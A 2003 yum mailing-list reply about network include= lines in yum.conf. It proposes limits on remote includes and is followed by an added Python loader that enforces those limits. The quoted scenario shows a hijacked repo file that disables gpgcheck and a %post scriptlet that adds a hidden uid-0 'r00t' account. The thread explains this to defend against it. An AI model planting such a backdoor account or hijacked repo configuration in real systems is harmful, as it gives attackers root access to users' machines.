[Yum] Security issues with include= implementation in yum.conf

On Sat, 4 Oct 2003, seth vidal wrote:

> 
> The first person who suggests gpg signing config files gets beaten. :)
> 
> My general take is that this is no big deal - but there is the possibility
> for much abuse and much flexibility. Hard call between the two of them.
> 
> From a standpoint of flexibility, being able to get parts of your config
> file from an arbitrary URL is useful and handy - on the other hand,
> think of this config file:
> 
> [main]
> include=http://domain.org/mymain.cgi
> 
> include=http://freshrpms.net/default-repo
> 
> include=http://fedora.us/default.repo
> 
> include=http://joeblows/default.repo
> 
> Now Fedora and freshrpms are trustworthy folks - but joeblow might not
> be, or their security might not be good enough, and the default.repo
> for joeblows might normally be:
> 
> [joeblows]
> name = joe blow's rpms - the best rpms money can buy
> baseurl=http://joeblows/rpms/
> gpgcheck=1
> 
> it could become:
> [joeblows]
> name = joe blow's rpms - the best rpms money can buy
> baseurl=http://someotherplace/evil/rpms/
> gpgcheck=0
> 
> 
> The result could be that someotherplace has taken all of joeblows'
> rpms and rebuilt them with:
> 
> %post
> /usr/sbin/adduser -r -u 0 -p somepass r00t
>
After looking at this I have a few suggestions.

	1) Allow the user to disable the network includes.
	2) Do not allow network includes to override already
	   configured global items.
	3) Perhaps have certain items that cannot be set (or unset)
	   via a network include.

I think that would go a long way towards making it more secure in a network
environment.

Cheers...james

P.S. The gpg signing did come to mind, but now I am in fear of saying it
(-;
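An added example, not part of this thread or of yum's own code: a small Python loader for a yum.conf-style file that applies the three suggestions above (a switch to disable network includes, no overriding of locally set [main] items, and a set of keys a network include may not touch). The PROTECTED_KEYS list, the in-memory stand-in for the network, the hostnames and the file contents are all assumptions constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

NETWORK_SCHEMES = {"http", "https", "ftp"}
# Suggestion 3: keys a network include may neither set nor unset
# (assumed list for this example, not yum's real policy).
PROTECTED_KEYS = frozenset({"gpgcheck", "gpgkey", "exclude", "pluginpath"})
_SECTION_RE = re.compile(r"^\[([^\]]+)\]$")
_KV_RE = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.*)$")


def is_network(source):
    """True for include targets fetched over the network."""
    return urlparse(source).scheme in NETWORK_SCHEMES


def load_config(text, fetch, allow_network=True, protected=PROTECTED_KEYS):
    """Parse ini-style text, resolving include= via fetch(url) -> str.
    Returns (config, warnings); config maps section -> {key: value}."""
    config, warnings = {}, []
    local_main = {}  # [main] keys set by local (non-network) files

    def parse(body, source, depth, remote):
        if depth > 5:
            warnings.append(f"{source}: include nesting too deep, skipped")
            return
        section = "main"  # options before any [header] count as [main]
        config.setdefault(section, {})
        for lineno, raw in enumerate(body.splitlines(), 1):
            line = raw.strip()
            if not line or line[0] in "#;":
                continue
            m = _SECTION_RE.match(line)
            if m:
                section = m.group(1)
                config.setdefault(section, {})
                continue
            m = _KV_RE.match(line)
            if not m:
                continue  # unparsable line, ignored
            key, value = m.group(1), m.group(2).strip()
            if key == "include":
                # Anything reached through a network include stays "remote".
                child_remote = remote or is_network(value)
                if child_remote and not allow_network:  # suggestion 1
                    warnings.append(f"{source}:{lineno}: network include {value} disabled")
                    continue
                try:
                    child = fetch(value)
                except KeyError:
                    warnings.append(f"{source}:{lineno}: cannot fetch {value}")
                    continue
                parse(child, value, depth + 1, child_remote)
            elif remote and key in protected:  # suggestion 3
                warnings.append(f"{source}:{lineno}: {key} not settable from network")
            elif remote and section == "main" and key in local_main:  # suggestion 2
                warnings.append(f"{source}:{lineno}: cannot override local {key}")
            else:
                if not remote and section == "main":
                    local_main[key] = value
                config[section][key] = value

    parse(text, "yum.conf", 0, False)
    return config, warnings


def effective(config, section, key, default=None):
    """Repo option lookup with the usual fall-back to [main]."""
    if key in config.get(section, {}):
        return config[section][key]
    return config.get("main", {}).get(key, default)


# Constructed sample input: a local yum.conf plus what the two URLs would
# serve, with joeblows' file replaced as in the scenario quoted above.
LOCAL_CONF = """\
[main]
cachedir=/var/cache/yum
gpgcheck=1
include=http://joeblows/default.repo
include=http://domain.org/mymain.cgi
"""
FAKE_NETWORK = {
    "http://joeblows/default.repo": """\
[joeblows]
name=joe blow's rpms - the best rpms money can buy
baseurl=http://someotherplace/evil/rpms/
gpgcheck=0
""",
    "http://domain.org/mymain.cgi": """\
[main]
cachedir=/tmp/evil
keepcache=1
""",
}
fake_fetch = FAKE_NETWORK.__getitem__  # KeyError stands in for a failed fetch
```

With the constructed input, load_config(LOCAL_CONF, fake_fetch) refuses and logs the hijacked gpgcheck=0 and the remote attempt to change cachedir, still accepts keepcache=1 from the remote [main] because nothing local set it, and effective(cfg, "joeblows", "gpgcheck") falls back to the local [main] value of 1; with allow_network=False neither URL is fetched at all. Two caveats: the "remote" taint is inherited by anything a network include pulls in itself, and baseurl is still taken from the remote file, so these rules keep signature checking switched on but do not make a hijacked repo file trustworthy.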

